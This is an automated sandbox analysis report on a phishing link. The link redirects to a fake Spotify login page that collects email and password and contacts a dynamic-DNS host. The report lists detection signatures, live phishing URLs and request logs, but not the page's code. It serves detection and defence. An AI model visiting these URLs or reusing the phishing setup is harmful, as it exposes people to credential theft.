Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg

Overview

General Information

Sample URL:https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMA
Analysis ID:1583258
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
Uses dynamic DNS services
HTML body contains low number of good links
HTML title does not match URL
Invalid 'forgot password' link found
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 2488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2800 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2020,i,13172820280483757675,6438960111630721238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADgSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://spoty-omsave0558101.codeanyapp.com/army/armyAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jquery.jsAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/remember.pngAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/loading.gifAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/app.cssAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/jq.jsAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/res/logo.pngAvira URL Cloud: Label: phishing
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpJoe Sandbox AI: Score: 9 Reasons: The brand 'Spotify' is a well-known music streaming service., The legitimate domain for Spotify is 'spotify.com'., The provided URL 'spoty-omsave0558101.codeanyapp.com' does not match the legitimate domain., The URL contains 'spoty', which is a misspelling of 'Spotify', indicating a potential phishing attempt., The domain 'codeanyapp.com' is not associated with Spotify and appears to be a third-party service, which is suspicious., The presence of input fields for 'Email or username' and 'Password' is typical for phishing sites attempting to capture user credentials. DOM: 1.0.pages.csv
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://spoty-omsave0558101.codeanyapp.com/army/ar... The provided JavaScript snippet exhibits several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of dynamic code execution. While the script may have a legitimate purpose, such as handling user login functionality, the implementation raises significant security concerns.
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Number of links: 0
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Title: Welcome does not match URL
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Invalid link: Forgot your password?
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: Form action: action.php
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: <input type="password" .../> found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No favicon
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="author".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found
Source: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpHTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: unknownDNS query: name: chacktgbot.duckdns.org
Source: unknownDNS query: name: _7001._https.chacktgbot.duckdns.org
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg HTTP/1.1Host: sdazraf.hosted.phplist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/ HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/login.php HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/app.css HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/logo.png HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/loading.gif HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/remember.png HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/jq.js HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/jquery.js HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/remember.png HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/logo.png HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/jquery.js HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/loading.gif HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/res/jq.js HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/login.php HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/login.php HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /army/army/auth/login.php HTTP/1.1Host: spoty-omsave0558101.codeanyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: sdazraf.hosted.phplist.com
Source: global trafficDNS traffic detected: DNS query: spoty-omsave0558101.codeanyapp.com
Source: global trafficDNS traffic detected: DNS query: chacktgbot.duckdns.org
Source: global trafficDNS traffic detected: DNS query: _7001._https.chacktgbot.duckdns.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 02 Jan 2025 07:53:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 310Connection: close
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13393
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.jquery.com/ticket/4833
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://drafts.csswg.org/css-conditional-4/#dfn-support-selector
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://drafts.csswg.org/css-conditional-4/#typedef-supports-selector-fn
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://drafts.csswg.org/selectors/#forgiving-selector
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://drafts.csswg.org/selectors/#relational
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://github.com/whatwg/html/issues/2369
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/#nonce-attributes
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://js.foundation/
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_58.2.dr, chromecache_60.2.drString found in binary or memory: https://sizzlejs.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
